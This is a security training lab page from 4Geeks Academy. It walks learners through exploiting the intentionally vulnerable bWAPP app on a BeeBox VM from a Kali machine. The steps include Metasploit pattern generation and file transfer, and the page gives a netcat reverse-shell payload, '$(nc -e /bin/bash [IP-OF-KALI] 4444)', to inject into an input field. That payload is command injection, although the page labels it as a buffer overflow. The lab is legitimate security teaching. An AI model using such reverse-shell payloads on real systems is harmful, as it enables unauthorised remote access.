Self-paced

Explore our extensive collection of courses designed to help you master various subjects and skills. Whether you're a beginner or an advanced learner, there's something here for everyone.

Bootcamp

Learn live

Join us for our free workshops, webinars, and other events to learn more about our programs and get started on your journey to becoming a developer.

Upcoming live events

Learning library

For all the self-taught geeks out there, here is our content library with most of the learning materials we have produced throughout the years.

It makes sense to start learning by reading and watching videos about fundamentals and how things work.

Search from all Lessons


LoginGet Started

Register to 4Geeks

← Back to Projects

Buffer overflow exploit

Difficulty

  • intermediate

Average duration

2 hrs

Technologies

Difficulty

  • intermediate

Average duration

2 hrs

Technologies

Buffer overflow exploit

By @rosinni and other contributors at 4Geeks Academy

build by developers build by developers

These instructions are available in english

🌱 How to Start This Project?

This exercise aims to learn how to identify and exploit buffer overflow vulnerabilities. Through this project, you will understand how buffer overflows can be used to execute arbitrary code, as well as apply exploitation techniques to compromise the security of the application.

Requirements

  • Kali Machine (attacker)
  • BeeBox Machine

📝 Instructions

  1. Verify that both Kali Linux and BeeBox are connected to the same network. You can do this by checking the IP addresses assigned to each machine and ensuring they can communicate with each other.

  2. Check connectivity. From Kali, try pinging BeeBox and vice versa to confirm that the network connection is working.

    1ping [IP-OF-BEEBOX] 2ping [IP-OF-KALI]
  3. Log in to the BeeBox machine.

Verify Buffer Overflow Vulnerability

  1. Enter a movie name that is in the bWAPP database (e.g., Hulk, Iron Man).

  2. Then enter a movie name that is not in the database (e.g., Harry Potter).

  3. Run the following command to view the contents of the bof_1.php file:

    1cat /var/www/bWAPP/bof_1.php

    The goal is to understand how the movie title input is handled and how it is passed as a command-line argument to the application. Look for signs of buffer overflow.

Generate and Use the Exploit String

  1. Generate the exploit string by running the following command on Kali to create a string that will help identify the buffer overflow:

    1/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 360
  2. Save the generated string in a file named pattern_chain.txt:

    1echo "Aa0Aa1Aa2Aa3Aa4Aa5..." > pattern_chain.txt
  3. Start an HTTP server on Kali to transfer the file:

    1python3 -m http.server 8080
  4. Download the pattern_chain.txt file on BeeBox using wget:

    1wget http://[IP-OF-KALI]:8080/pattern_chain.txt
  5. Read the content of the downloaded file on BeeBox:

    1cat pattern_chain.txt

Inject the Exploit String and Payload

  1. Use the string generated with pattern_create.rb in the field or parameter that may cause the buffer overflow in bWAPP.

image 1

The goal is to see how the application responds to input that exceeds the expected size.

  1. Run a listener on Kali to receive the remote shell:

    1nc -lvnp 4444
  2. To obtain a remote shell, inject the following payload into the field that causes the overflow:

    1$(nc -e /bin/bash [IP-OF-KALI] 4444)

Replace [IP-OF-KALI] with the IP address of your Kali machine.

  1. Confirm the connection on Kali. If the exploit is successful, you should see a connection in the Kali listener and receive a Bash prompt.

Check Server Logs

  1. Review the web server logs on BeeBox for any messages related to the buffer overflow:

    1sudo cat /var/log/apache2/error.log

image 1

Sign up and get access to interactive tutorial

We will use it to give you access to your account.
Already have an account? Login here.

By signing up, you agree to the Terms and conditions and Privacy policy.

Difficulty

  • intermediate

Average duration

2 hrs

Technologies

Difficulty

  • intermediate

Average duration

2 hrs

Technologies

Difficulty

  • intermediate

Average duration

2 hrs

Technologies

Difficulty

  • intermediate

Average duration

2 hrs

Technologies

Sign up and get access to interactive tutorial

We will use it to give you access to your account.
Already have an account? Login here.

By signing up, you agree to the Terms and conditions and Privacy policy.

Difficulty

  • intermediate

Average duration

2 hrs

Technologies

Difficulty

  • intermediate

Average duration

2 hrs

Technologies